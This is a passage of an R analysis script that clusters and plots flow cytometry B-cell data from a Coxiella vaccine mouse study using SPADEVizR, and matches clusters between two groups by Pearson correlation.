### Displays an heatmap representation summarizing phenotypes for the overall dataset
heatmapViewer(results)
####################################################################################################################################################################################
#################################################################################################################################################################################### | /SpadevizR-analysis/DR3 Grouped Day 51/B Cells (smaller K)/DR3 Day 51 B Cells R Script.R | permissive | reeves-lab/2020-Coxiella-Scientific-Reports | R | false | false | 53,591 | r | ####################################################
#### INSTALLATION OF ALL PACKAGES Below - do not need to repeat if already in library (Try running lines 16-19 first, if some packages missing revert to line 4-11):
####################################################
source("https://bioconductor.org/biocLite.R")
biocLite()
biocLite("FlowSOM")
install.packages("biocLite")
biocLite(suppressUpdates = TRUE)
biocLite("flowCore", suppressUpdates = TRUE)
install.packages('devtools')
install.packages('Rcpp')
install.packages('biclust')
install.packages('data.table')
install.packages('diptest')
install.packages('evtree')
install.packages('ggdendro')
install.packages("ggfortify")
install.packages('ggplot2')
install.packages('gplots')
install.packages('gdata')
install.packages('ggrepel')
install.packages('ggRandomForests')
install.packages('gridExtra')
install.packages('gtable')
install.packages('gtools')
install.packages('igraph')
install.packages('MASS')
install.packages('packcircles')
install.packages('plyr')
install.packages("randomForestSRC")
install.packages('reshape2')
install.packages('pheatmap')
install.packages('readxl')
install.packages("raster")
install.packages('openxlsx')
install.packages('devtools')
library("devtools")
install_github('tchitchek-lab/SPADEVizR')
source("http://bioconductor.org/biocLite.R")
biocLite(suppressUpdates = TRUE)
biocLite("flowCore", suppressUpdates = TRUE)
install.packages('edgeR')
biocLite("edgeR")
install.packages("bindrcpp")
install.packages("stringi")
install.packages("statmod")
###################################################
# Library the packages
###################################################
library("devtools")
library("FlowSOM")
library('Rcpp')
library("SPADEVizR")
library(statmod)
library("edgeR")
library(gplots)
library(RColorBrewer)
library(pheatmap)
library(readxl)
library(openxlsx)
library(data.table)
library(ggplot2)
library(raster)
####################################################
####################################################
source("utils.R") #Sources utils function for phenoviewer_modified
##################################################
# Parallel coordinate plots generated using SPADEvizR - FOR GROUP 1 DATA:
##################################################
### Imports Sheet 4 and Sheet 2 and renames "Abundance" and "Phenotype" respectively, from desired excel file - must change path and excel file name for particular function
PrimaryDirectory <- getwd()
Abundance <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet4")
View(Abundance)
Phenotype <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet2")
View(Phenotype)
### Reformats data for R to run SpadeVizR Script - must change lines 43 and 47 to match size of Abundance and Phenotype Sheets (rows, columns)
cluster.abundances <- as.data.frame(Abundance[1:185,1:17])
rownames(cluster.abundances) <- cluster.abundances[,1]
cluster.abundances <- cluster.abundances[,-1]
cluster.phenotypes <- as.data.frame(Phenotype[1:2960,1:37])
cluster.phenotypes <- cluster.phenotypes[,-3]
results <- importResultsFromTables(cluster.abundances = cluster.abundances, cluster.phenotypes = cluster.phenotypes)
### MODIFIED PHENOVIEWER SCRIPT FOR MORE ACCURATE PARALLEL PLOTS ###
phenoViewer_modified <- function(Results,
samples = NULL,
clusters = NULL,
markers = NULL,
show.mean = "both",
show.on_device = TRUE,
sort.markers = TRUE) {
### when testing the function, use the parameters inside the function and test line by line of code. Use statement below to test the function above
# Results=results
# samples = NULL
# clusters = "Cluster 10"
# markers = NULL
# show.mean = "only"
# show.on_device = TRUE
# sort.markers = TRUE
if (is.null(Results)) {
stop("Error in phenoViewer: 'Results' parameter can not be NULL")
} else if (class(Results)[1] != "Results") {
stop("Error in phenoViewer: 'Results' parameter must be a 'Results' object")
}
if(length(Results@marker.names) == 0){
stop("Error in phenoViewer: 'Results' object must contain phenotypes")
}
if (is.null(samples)) {
samples <- Results@sample.names
data <- Results@cluster.phenotypes
cluster.abundances <- Results@cluster.abundances
} else if (!all(samples %in% Results@sample.names)) {
stop("Error in phenoViewer: 'samples' parameter must contains only samples names\n Unknown sample names: ",
paste(setdiff(unique(samples), Results@sample.names), collapse = " "))
} else {
data <- subset(Results@cluster.phenotypes, sample %in% samples, drop = FALSE)
cluster.abundances <- Results@cluster.abundances[, samples, drop = FALSE]
}
data <- stats::na.omit(data)
if (is.null(clusters)) {
stop("Error in phenoViewer: 'clusters' parameter is required")
} else if (all(clusters %in% Results@cluster.names)) {
if (typeof(clusters) != "character") {
stop("Error in phenoViewer: 'clusters' parameter must be a character vector")
}
clusters <- unique(clusters)
clusters.select <- data[, "cluster"] %in% clusters
data <- data[clusters.select,]
cluster.abundances <- cluster.abundances[clusters,]
} else {
stop("Error in phenoViewer:\nUnknown clusters : ", paste(setdiff(unique(clusters), Results@cluster.names), collapse = " "))
}
data <- plyr::ddply(data, c("sample"), function(df) {
apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
})
if (is.null(markers)) {
markers <- Results@marker.names
} else if (all(markers %in% Results@marker.names)) {
markers <- unique(markers)
data <- data[, c("sample", markers)]
} else {
stop("Error in phenoViewer: Unknown markers :", paste(setdiff(unique(markers), Results@marker.names), collapse = " "))
}
if (show.mean != "none" && show.mean != "both" && show.mean != "only") {
stop("Error in phenoViewer: 'show.mean' parameter must contain only one of these : 'none', 'both' or 'only'")
}
if (!is.logical(show.on_device)) { stop("Error in phenoViewer: 'show.on_device' parameter must be a logical") }
data <- reshape2::melt(data, id = c("sample"), stringsAsFactors = FALSE)
colnames(data) <- c("samples", "marker", "value")
names.palette <- unique(Results@cluster.phenotypes$sample)
palette <- ggcolors(length(names.palette))
names(palette) <- names.palette
assignments <- Results@assignments
if (!is.null(assignments)) {
order <- unique(assignments$bc)
assignments <- assignments[samples, , drop = FALSE]
data$bc <- assignments[data$samples, "bc"]
order <- intersect(order, unique(assignments$bc))
data$bc <- factor(data$bc, levels = order)
names.palette <- unique(assignments$bc)
palette <- ggcolors(length(names.palette))
names(palette) <- names.palette
} else if (is.element("bc", colnames(assignments))) {
warning("Warning in phenoViewer: 'assignments' slot do not contain the column 'bc' in the provided 'Results' object. Consequently, the samples names will be used in remplacement")
} else {
warning("Warning in phenoViewer: 'assignments' slot in the provided 'Results' object is absent. Consequently, the samples names will be used in remplacement")
}
if(sort.markers==TRUE){
clustering.markers <- Results@clustering.markers
ordered.markers <- c(gtools::mixedsort(clustering.markers),gtools::mixedsort(setdiff(Results@marker.names, clustering.markers)))
bold.markers <- ifelse(is.element(ordered.markers, clustering.markers), "bold", "plain")
colored.markers <- ifelse(is.element(ordered.markers, clustering.markers), "blue", "black")
data$marker <- factor(data$marker, levels = ordered.markers, ordered = TRUE)
}else{
clustering.markers <- Results@clustering.markers
ordered.markers <- markers
bold.markers <- ifelse(is.element(ordered.markers, clustering.markers), "bold", "plain")
colored.markers <- ifelse(is.element(ordered.markers, clustering.markers), "blue", "black")
data$marker <- factor(data$marker, levels = ordered.markers, ordered = TRUE)
}
for (i in seq_len(nrow(data))) {
data[i, "lower.bound"] <- Results@bounds[1, as.character(data[i, "marker"])]
data[i, "upper.bound"] <- Results@bounds[2, as.character(data[i, "marker"])]
}
cells.number <- sum(colSums(cluster.abundances))
title <- paste("Pheno Viewer - cluster: ", paste0(clusters, collapse = ", "), " (", format(cells.number, big.mark = " "), " cells)", sep = "")
bounds <- as.numeric(row.names(Results@bounds))
subtitle <- paste0("Grey ribbon displays from ", (bounds[1] * 100), "% to ", (bounds[2] * 100), "% percentiles of the range expression")
max.value <- -1
min.value <- -1
max.value <- max(c(data$value, data$upper.bound), na.rm = TRUE)
min.value <- min(c(data$value, data$lower.bound), na.rm = TRUE)
max.value <- max.value * (1 + sign(max.value) * 0.1)
min.value <- min.value * (1 - sign(min.value) * 0.1)
means <- plyr::ddply(data,
c("marker"),
function(df){mean(df$value, na.rm = TRUE)})
colnames(means) <- c("marker", "means")
data_means <- data.frame(marker = 0, means= 0, clusters = 0)
tmp_clusters<- unique(cluster.phenotypes$Cluster) ###### make sure the cluster.phenotypes file column name is "Cluster" and not "cluster"
for(i in tmp_clusters){
tmp_data<- Results@cluster.phenotypes
tmp_clusters.select <- tmp_data[, "cluster"] %in% i
tmp_data <- tmp_data[tmp_clusters.select,]
tmp_data <- plyr::ddply(tmp_data, c("sample"), function(df) {
apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
})
tmp_data <- reshape2::melt(tmp_data, id = c("sample"), stringsAsFactors = FALSE)
colnames(tmp_data) <- c("samples", "marker", "value")
tmp_means <- plyr::ddply(tmp_data,
c("marker"),
function(df){mean(df$value, na.rm = TRUE)})
colnames(tmp_means) <- c("marker", "means")
tmp_means$clusters = i
data_means = rbind(data_means, tmp_means)
}
data_means = data_means[-1, ]
# data_means$marker = substr(data_means$marker, 2, 100000)
#data_means = data_means[order(data_means$marker, decreasing = TRUE), ]
plot <- ggplot2::ggplot(data = data_means) +
ggplot2::ggtitle(bquote(atop(.(title), atop(italic(.(subtitle)), ""))))
plot <- plot + ggplot2::geom_line(ggplot2::aes_string(x = "marker", y = "means", group = "clusters"),
size = 0.5, #changes size of background lines
alpha = 1,
color = "#CCCCCC")+
ggplot2::scale_y_continuous(limits = c(min.value, max.value), breaks = round(seq(0, max.value, by = 1), 0)) +
ggplot2::theme_bw()
plot <- plot + ggplot2::geom_line(data = means,
ggplot2::aes_string(x = "marker", y = "means", group = 1),
#group = 1,
linetype = "solid",
size = 1,
color = "#FF6666")
plot <- plot + ggplot2::theme(axis.text.x = ggplot2::element_text(angle = 90, hjust = 1, vjust = 0.5, face = bold.markers, color = colored.markers)) +
ggplot2::theme(legend.text = ggplot2::element_text(size = 6),
legend.key = ggplot2::element_blank(),
plot.title = ggplot2::element_text(hjust=0.5)) +
ggplot2::xlab("markers") +
ggplot2::ylab("marker expressions") +
ggplot2::guides(col = ggplot2::guide_legend(ncol = 1))
grid::grid.draw(plot)
invisible(plot)
}
dir.create("Group1_ClusterImages", showWarnings = FALSE)
setwd("Group1_ClusterImages")
for(i in 1:nrow(cluster.abundances)){
#i=1
jpeg(paste(rownames(cluster.abundances)[i], ".jpeg", sep = ""),
width=2000,
height=1500,
res = 300)
phenoViewer_modified(results, clusters = rownames(cluster.abundances)[i])
dev.off()
}
setwd(PrimaryDirectory)
####################################
#SCATTER PLOT GENERATOR
###################################
GroupOne_SheetFour <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet4")
write.table(GroupOne_SheetFour, file = "Data for Scatter Plot Group 1.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
#load data
data <- read.table("Data for Scatter Plot Group 1.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
data <- as.data.frame(data[1:185,1:17])
data$Cluster <- gsub(" ", "_", data$Cluster, fixed = TRUE)
rownames(data) <- data$Cluster
data <- data[,-1]
sum_counts_sample <- colSums(data)
for (i in 1:nrow(data)) {
for (j in 1:ncol(data)) {
data[i,j] = data[i,j]/sum_counts_sample[j]*100
}
}
#transpose the data for ploting
data <- t(data)
data <- as.data.frame(data)
#group assignment
group_data <- read.table("group assignment for group 1.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
group_data$sample <- trim(group_data$sample)
group_data$sample = gsub(" ", ".", group_data$sample, fixed = TRUE)
data$group <- group_data$group#[match(rownames(data), group_data$sample)]
data <- data[, c(ncol(data), 1:(ncol(data)-1))]
dir.create("Group1_Scatterplots", showWarnings = FALSE)
setwd("Group1_Scatterplots")
x_order = factor(data$group, levels=c("Naive Unchallenged", "Naive Challenged", "Vax Unchallenged","Vax Challenged"), ordered=TRUE)
for(i in 2:ncol(data)){
scatter_plot <-
ggplot(data, aes_string(x = x_order, fill = "group", y = colnames(data)[i]))+
geom_dotplot(binaxis = "y", stackdir = "centerwhole") +
stat_summary(fun.y = "median", size=0.5, geom = 'line', aes(group=1))+
stat_summary(
fun.ymin = function(z) { quantile(z,0.25) },
fun.ymax = function(z) { quantile(z,0.75) },
fun.y = median,
width = 0.2,
geom = "errorbar") +
theme(axis.text.x = element_text(size = 25, face = "bold", vjust = 1.0, hjust = 1.0, angle = 45)) +
theme(axis.text.y = element_text(size = 20, face = "bold", vjust = 0.5, hjust = 0.5, angle = 0)) +
theme(legend.position = "none")
ggsave(scatter_plot,
width = 20,
height = 15,
dpi = 300,
filename = paste(colnames(data)[i], ".jpeg", sep = ""))
}
setwd(PrimaryDirectory)
##################################################
# Parallel co-ordinate plots generated using SPADEvizR - FOR GROUP 2 DATA:
##################################################
### Imports Sheet 4 and Sheet 2 and renames "Abundance" and "Phenotype" respectively, from desired excel file - must change path and excel file name for particular function
Abundance <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet4")
View(Abundance)
Phenotype <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet2")
View(Phenotype)
### Reformats data for R to run SpadeVizR Script - must change lines 85 and 89 to match size of Abundance and Phenotype Sheets (rows, columns)
cluster.abundances <- as.data.frame(Abundance[1:151,1:16])
rownames(cluster.abundances) <- cluster.abundances[,1]
cluster.abundances <- cluster.abundances[,-1]
cluster.phenotypes <- as.data.frame(Phenotype[1:2265,1:37])
cluster.phenotypes <- cluster.phenotypes[,-3]
results <- importResultsFromTables(cluster.abundances = cluster.abundances, cluster.phenotypes = cluster.phenotypes)
dir.create("Group2_ClusterImages", showWarnings = FALSE)
setwd("Group2_ClusterImages")
for(i in 1:nrow(cluster.abundances)){
jpeg(paste(rownames(cluster.abundances)[i], ".jpeg", sep = ""),
width=2000,
height=1500,
res = 300)
phenoViewer_modified(results, clusters = rownames(cluster.abundances)[i])
dev.off()
}
setwd(PrimaryDirectory)
####################################
#SCATTER PLOT GENERATOR
###################################
GroupTwo_SheetFour <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet4")
write.table(GroupTwo_SheetFour, file = "Data for Scatter Plot Group 2.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
#load data
data <- read.table("Data for Scatter Plot Group 2.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
data <- as.data.frame(data[1:151,1:16])
data$Cluster <- gsub(" ", "_", data$Cluster, fixed = TRUE)
rownames(data) <- data$Cluster
data <- data[,-1]
sum_counts_sample <- colSums(data)
for (i in 1:nrow(data)) {
for (j in 1:ncol(data)) {
data[i,j] = data[i,j]/sum_counts_sample[j]*100
}
}
#transpose the data for ploting
data <- t(data)
data <- as.data.frame(data)
#group assignment
group_data <- read.table("group assignment for group 2.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
group_data$sample <- trim(group_data$sample)
group_data$sample = gsub(" ", ".", group_data$sample, fixed = TRUE)
data$group <- group_data$group#[match(rownames(data), group_data$sample)]
data <- data[, c(ncol(data), 1:(ncol(data)-1))]
dir.create("Group2_Scatterplots", showWarnings = FALSE)
setwd("Group2_Scatterplots")
x_order = factor(data$group, levels=c("Naive Unchallenged", "Naive Challenged", "Vax Unchallenged","Vax Challenged"), ordered=TRUE)
for(i in 2:ncol(data)){
scatter_plot <-
ggplot(data, aes_string(x = x_order, fill = "group", y = colnames(data)[i]))+
geom_dotplot(binaxis = "y", stackdir = "centerwhole") +
stat_summary(fun.y = "median", size=0.5, geom = 'line', aes(group=1))+
stat_summary(
fun.ymin = function(z) { quantile(z,0.25) },
fun.ymax = function(z) { quantile(z,0.75) },
fun.y = median,
width = 0.2,
geom = "errorbar") +
theme(axis.text.x = element_text(size = 25, face = "bold", vjust = 1.0, hjust = 1.0, angle = 45)) +
theme(axis.text.y = element_text(size = 20, face = "bold", vjust = 0.5, hjust = 0.5, angle = 0)) +
theme(legend.position = "none")
ggsave(scatter_plot,
width = 20,
height = 15,
dpi = 300,
filename = paste(colnames(data)[i], ".jpeg", sep = ""))
}
setwd(PrimaryDirectory)
#########################################################################################################################################################
#########################################################################################################################################################
#### Next four lines of code generate .txt files from sheet one of group 1 and 2 excel sheets to be used for pearson's correlation
### Creates a .txt file of sheet one from Group 1 excel file containing all vortex data
GroupOne_SheetOne <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet1")
write.table(GroupOne_SheetOne, file = "Grp 1 DR3 D51 B Cells 20181205 K=35.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
### Creates a .txt file of sheet one from Group 2 excel file containing all vortex data
GroupTwo_SheetOne <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet1")
write.table(GroupTwo_SheetOne, file = "Grp 2 DR3 D51 B Cells 20181205 K=26.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
###################################################
# Generates a list of matching clusters from group 1 and 2 based on pearson's correlation and count
###################################################
rescale_to_0_1 <- function(experiment_name, experiment_file, rescale = TRUE){
#read the file
raw_table = read.delim(experiment_file, sep = "\t", stringsAsFactors = FALSE)
#modify the column name
colnames(raw_table) = gsub("X.", "", colnames(raw_table), fixed = TRUE)
colnames(raw_table) = gsub("X", "", colnames(raw_table), fixed = TRUE)
#modify the cluster name
raw_table$Cluster = gsub("Cluster", "", raw_table$Cluster, fixed = TRUE)
raw_table$Cluster = gsub(" ", "", raw_table$Cluster, fixed = TRUE)
raw_table$Cluster = paste("Cluster_", raw_table$Cluster, sep = "")
#sorting the dataset for better view
raw_table = raw_table[order(raw_table$Cluster, raw_table$Term, decreasing = FALSE),]
#obtain the samples name
samples = unique(raw_table$Term)
#obtain the amount of samples
nSample= length(samples)
#obtain the cluster name
clusters = unique(raw_table$Cluster)
#obtain the amount of clusters
nCluster = length(clusters)
#create a blank table with labels
mean_marker_total_cells = data.frame(tmp_name = 0)
for(i in 1:(ncol(raw_table)-1)){
mean_marker_total_cells = cbind(mean_marker_total_cells, 0)
}
colnames(mean_marker_total_cells) = colnames(raw_table)
mean_marker_total_cells = mean_marker_total_cells[, colnames(mean_marker_total_cells)!= "Term"]
# creat a array for storing the number of total numbers of cluster for samples
cluster_count = rep(0,nCluster)
#calculate and store the total numbers of cluster for samples
j = 1
k = 1
for(i in 1:nrow(raw_table)){
if(i == nrow(raw_table)){
cluster_count[j] = cluster_count[j] + 1
for(n in 1:ncol(mean_marker_total_cells)){
if(n == 1){
mean_marker_total_cells[k,n] = raw_table$Cluster[i]
}
if(n == 2){
mean_marker_total_cells[k,n] = sum(raw_table[(i-cluster_count[j]+1):i,n+1])
}
if(n > 2){
mean_marker_total_cells[k,n] = mean(raw_table[(i-cluster_count[j]+1):i,n+1])
}
}
break()
}
if(raw_table$Cluster[i] == raw_table$Cluster[i+1]){
cluster_count[j] = cluster_count[j] + 1
}else{
cluster_count[j] = cluster_count[j] + 1
for(n in 1:ncol(mean_marker_total_cells)){
if(n == 1){
mean_marker_total_cells[k,n] = raw_table$Cluster[i]
}
if(n == 2){
mean_marker_total_cells[k,n] = sum(raw_table[(i-cluster_count[j]+1):i,n+1])
}
if(n > 2){
mean_marker_total_cells[k,n] = mean(raw_table[(i-cluster_count[j]+1):i,n+1])
}
}
mean_marker_total_cells = rbind(mean_marker_total_cells, 0)
j = j + 1
k = k + 1
}
}
tmp_rescale <- function(x) (x-min(x))/(max(x) - min(x))
tmp_mean_marker_total_cells = mean_marker_total_cells
tmp_mean_marker_total_cells$Cluster = paste(experiment_name,
"_",
tmp_mean_marker_total_cells$Cluster,
sep = "")
rownames(tmp_mean_marker_total_cells) = tmp_mean_marker_total_cells[,1]
tmp_mean_marker_total_cells = tmp_mean_marker_total_cells[,-1]
tmp_mean_marker_total_cells$Count1 = tmp_mean_marker_total_cells$Count
if(rescale==TRUE){
for(i in 1:(ncol(tmp_mean_marker_total_cells)-1)){
tmp_mean_marker_total_cells[,i] = tmp_rescale(tmp_mean_marker_total_cells[,i])
}
}
return(tmp_mean_marker_total_cells)
}
### Change experiment_file names to match reformatted excel sheets used for SpadevizR
## All files must be in correct folder in the working path in order to run code!
experiment1 = rescale_to_0_1(experiment_name = "Grp1",
experiment_file = "Grp 1 DR3 D51 B Cells 20181205 K=35.txt",
rescale = TRUE)
#includes count - can # if dont want to rank based on count
#experiment1 = experiment1[, colnames(experiment1) != "Count"]
experiment2 = rescale_to_0_1(experiment_name = "Grp2",
experiment_file = "Grp 2 DR3 D51 B Cells 20181205 K=26.txt",
rescale = TRUE)
#includes count - can # if dont want to rank based on count
#experiment2 = experiment2[, colnames(experiment2) != "Count"]
experiment1_1 = experiment1
experiment1 = experiment1[, colnames(experiment1) != "Count1"]
experiment2_1 = experiment2
experiment2 = experiment2[, colnames(experiment2) != "Count1"]
#create a blank table to store the pearson correlation results
experiment1_experiment2_Pearson_correlation<-data.frame(experiment1_cluster = 0, experiment2_cluster = 0, experiment1_count = 0, experiment2_count = 0)
#perform pairwise pearson correlation between experiment1 and experiment2
t=1
for(i in 1:nrow(experiment1)){
for(j in 1:nrow(experiment2)){
experiment1_experiment2_Pearson_correlation$experiment1_cluster[t]<-rownames(experiment1)[i]
experiment1_experiment2_Pearson_correlation$experiment2_cluster[t]<-rownames(experiment2)[j]
pearson_statictis<-cor.test(as.numeric(experiment1[i,]),as.numeric(experiment2[j,]),method = "pearson")
experiment1_experiment2_Pearson_correlation$cor[t]<-pearson_statictis$estimate
experiment1_experiment2_Pearson_correlation$p.value[t]<-pearson_statictis$p.value
experiment1_experiment2_Pearson_correlation$experiment1_count[t]<-experiment1_1$Count1[i]
experiment1_experiment2_Pearson_correlation$experiment2_count[t]<-experiment2_1$Count1[j]
t<-t+1
experiment1_experiment2_Pearson_correlation<-rbind(experiment1_experiment2_Pearson_correlation, 0)
}
}
experiment1_experiment2_Pearson_correlation = experiment1_experiment2_Pearson_correlation[, c(1,2,5,6,3,4)]
#Sorting the data for better view
experiment1_experiment2_Pearson_correlation = experiment1_experiment2_Pearson_correlation[
order(experiment1_experiment2_Pearson_correlation$cor, decreasing = TRUE),]
#Take a look at the results
View(experiment1_experiment2_Pearson_correlation)
# create a CSV file storing the pearson correlation data
write.csv(experiment1_experiment2_Pearson_correlation, "DR3 D51 B Cells Pearsons Coefficient.csv", row.names = FALSE)
####################################################################################################################################################################################
####################################################################################################################################################################################
setwd(PrimaryDirectory)
##################################################
## Matching Script - combines cluster data from group 1 and 2 and reformats to create grouped_file containing all cluster information for newly named matched clusters (n=4 -> n=8)
##################################################
# read data
Grp1_file <- "Grp 1 DR3 D51 B Cells 20181205 K=35.txt"
Grp1_data <- read.table(Grp1_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp1_data$Cluster = paste("Grp1_Cluster_", Grp1_data$Cluster, sep ="")
Grp2_file <- "Grp 2 DR3 D51 B Cells 20181205 K=26.txt"
Grp2_data <- read.table(Grp2_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp2_data$Cluster = paste("Grp2_Cluster_", Grp2_data$Cluster, sep ="")
### CHANGE Number in the parentheses to match the number of markers used (ie, 40 in Live cells -> 35 in innate cells)
for(i in 4:37){
#i = 4
Grp1_min = min(Grp1_data[,i])
Grp2_min = min(Grp2_data[,i])
if(Grp1_min > Grp2_min){
correlation = Grp1_min - Grp2_min
Grp1_data[,i] = Grp1_data[,i] - correlation
}
if(Grp2_min > Grp1_min){
correlation = Grp2_min - Grp1_min
Grp2_data[,i] = Grp2_data[,i] - correlation
}
}
grouped_file = rbind(Grp1_data, Grp2_data)
### MAKE SURE THE COLUMN V ("CXCR4" has the X in it. Often group 2 sheet will read "CCR4")
# Change matching_file_name to name of .txt file that contains Group 1 Clusters and their new_name in addition to matching Group 2 Clusters and their new_name
matching_file_name = "Matched Clusters DR3 Day 51 B Cell.txt"
#grouped_file = read.table(grouped_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = read.table(matching_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = cbind(matching_file, 0)
colnames(matching_file)[3] = "Cluster_new"
for(i in 1:(nrow(matching_file)/2)){
matching_file$Cluster_new[i] = paste("Grp1_Cluster_", matching_file$Cluster[i], sep = "")
}
for(i in ((nrow(matching_file)/2)+1):nrow(matching_file)){
matching_file$Cluster_new[i] = paste("Grp2_Cluster_", matching_file$Cluster[i], sep = "")
}
matching_file = matching_file[,c(3,1,2)]
matching_file$Cluster = NULL
colnames(matching_file)[1] = "Cluster"
#match the new name
grouped_file$new_cluster_name = matching_file$new_name[match(grouped_file$Cluster, matching_file$Cluster)]
#resort the data
grouped_file = grouped_file[, c(1, 2, ncol(grouped_file), 3:(ncol(grouped_file)-1))]
#Replace NA in new_cluster_name with original cluster number
for (i in 1: nrow(grouped_file)){
if(is.na(grouped_file$new_cluster_name[i]) == TRUE){
grouped_file$new_cluster_name[i] = substr(grouped_file$Cluster[i], 1, 20)
}
}
# #delete the unmatched clusters
# grouped_file = grouped_file[!is.na(grouped_file$new_cluster_name), ]
#sorting the data for better view
grouped_file = grouped_file[order(grouped_file$new_cluster_name),]
grouped_file = cbind(grouped_file, 0)
### CHANGE NUMBER IN BRACKETS BELOW TO MATCH NUMBER OF MARKERS + 2
colnames(grouped_file)[39] = "Cluster_new"
grouped_file = grouped_file[,c(39,1:ncol(grouped_file))]
grouped_file$Cluster = NULL
colnames(grouped_file)[1] = "Cluster"
grouped_file$Cluster = grouped_file$new_cluster_name
grouped_file$new_cluster_name = NULL
grouped_file$Cluster_new.1 = NULL
write.xlsx(grouped_file, "Phenotype DR3 Day51 B Cells ALL BACKGROUND.xlsx", row.names=FALSE)
##############################################
# Generates an "Abundance" sheet to use for analysis using the frequency of the cluster in the mouse
##############################################
#-------recale function-------#
tmp_percent <- function(x) (x/sum(x))*100
#-------recale function-------#
# Change grouped_file_name to name of .txt file that contains ALL DATA from Group 1 and 2
Grp1_file = "Data for Scatter Plot Group 1.txt"
Grp2_file = "Data for Scatter Plot Group 2.txt"
Grp1_data = read.table(Grp1_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp1_data <- as.data.frame(Grp1_data[1:185,1:17])
Grp1_data$Cluster = paste("Grp1_", Grp1_data$Cluster, sep ="")
Grp1_data$Cluster = gsub(" ", "_", Grp1_data$Cluster)
#rescale the markers expression
for(i in 2:ncol(Grp1_data)){
Grp1_data[,i] = tmp_percent(Grp1_data[,i])
}
Grp2_data = read.table(Grp2_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp2_data <- as.data.frame(Grp2_data[1:151,1:16])
Grp2_data$Cluster = paste("Grp2_", Grp2_data$Cluster, sep ="")
Grp2_data$Cluster = gsub(" ", "_", Grp2_data$Cluster)
#rescale the markers expression
for(i in 2:ncol(Grp2_data)){
Grp2_data[,i] = tmp_percent(Grp2_data[,i])
}
matching_file_name = "Matched Clusters DR3 Day 51 B Cell.txt"
#grouped_file = read.table(grouped_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = read.table(matching_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = cbind(matching_file, 0)
colnames(matching_file)[3] = "Cluster_new"
for(i in 1:(nrow(matching_file)/2)){
matching_file$Cluster_new[i] = paste("Grp1_Cluster_", matching_file$Cluster[i], sep = "")
}
for(i in ((nrow(matching_file)/2)+1):nrow(matching_file)){
matching_file$Cluster_new[i] = paste("Grp2_Cluster_", matching_file$Cluster[i], sep = "")
}
matching_file = matching_file[,c(3,1,2)]
matching_file$Cluster = NULL
colnames(matching_file)[1] = "Cluster"
#create a blank table to store data
grouped_data = data.frame(tmp_name = 0)
tmp_data = matching_file[matching_file$new_name == 1,]
Grp1_tmp_data = Grp1_data[Grp1_data$Cluster %in% tmp_data$Cluster, ]
rownames(Grp1_tmp_data) = Grp1_tmp_data$Cluster
Grp1_tmp_data$Cluster = NULL
Grp2_tmp_data = Grp2_data[Grp2_data$Cluster %in% tmp_data$Cluster, ]
rownames(Grp2_tmp_data) = Grp2_tmp_data$Cluster
Grp2_tmp_data$Cluster = NULL
tmp_combined_data_1 = cbind(Grp1_tmp_data, Grp2_tmp_data)
#tmp_combined_data_1 = rbind(Grp1_tmp_data, Grp2_tmp_data)
#rownames(tmp_combined_data_1) = paste("Cluster_", 1, sep = "")
grouped_data = tmp_combined_data_1
for (i in unique(matching_file$new_name)){
#i=1
tmp_data = matching_file[matching_file$new_name == i,]
Grp1_tmp_data = Grp1_data[Grp1_data$Cluster %in% tmp_data$Cluster, ]
rownames(Grp1_tmp_data) = Grp1_tmp_data$Cluster
Grp1_tmp_data$Cluster = NULL
Grp2_tmp_data = Grp2_data[Grp2_data$Cluster %in% tmp_data$Cluster, ]
rownames(Grp2_tmp_data) = Grp2_tmp_data$Cluster
Grp2_tmp_data$Cluster = NULL
tmp_combined_data = cbind(Grp1_tmp_data, Grp2_tmp_data)
rownames(tmp_combined_data) = paste("Cluster_", i, sep = "")
grouped_data = rbind(grouped_data, tmp_combined_data)
}
grouped_data = grouped_data[-1, ]
#grouped_file = grouped_file[order(grouped_file$new_cluster_name),]
write.xlsx(grouped_data, "Abundance DR3 Day 51 B Cell Data.xlsx", row.names=TRUE)
#####################################################################################################
#MODIFIED PCP GENERATOR FOR PHENOTYPE
#####################################################################################################
setwd(PrimaryDirectory)
### Import "Phenotype", from desired excel file - must change path and excel file name for particular function
##### MAKE SURE YOU HAVE SAVED YOUR GENERATED PHENOTYPE SHEET AS AN .XLSX File
Phenotype <- read_excel("./Phenotype DR3 Day51 B Cells ALL BACKGROUND.xlsx", sheet = "Sheet 1")
View(Phenotype)
#Must change parameters of phenotype sheet according to file size
cluster.phenotypes <- as.data.frame(Phenotype[1:5225,1:37])
cluster.phenotypes <- cluster.phenotypes[,-3]
phenoViewer_modified_v2 <-function( cluster.phenotypes,
samples = NULL,
clusters,
markers = NULL,
show.mean = "only",
show.on_device = TRUE,
sort.markers = TRUE){
if (is.null(samples)) {
samples <- unique(cluster.phenotypes$Term)
data <- cluster.phenotypes
} else if (!all(samples %in% Results@sample.names)) {
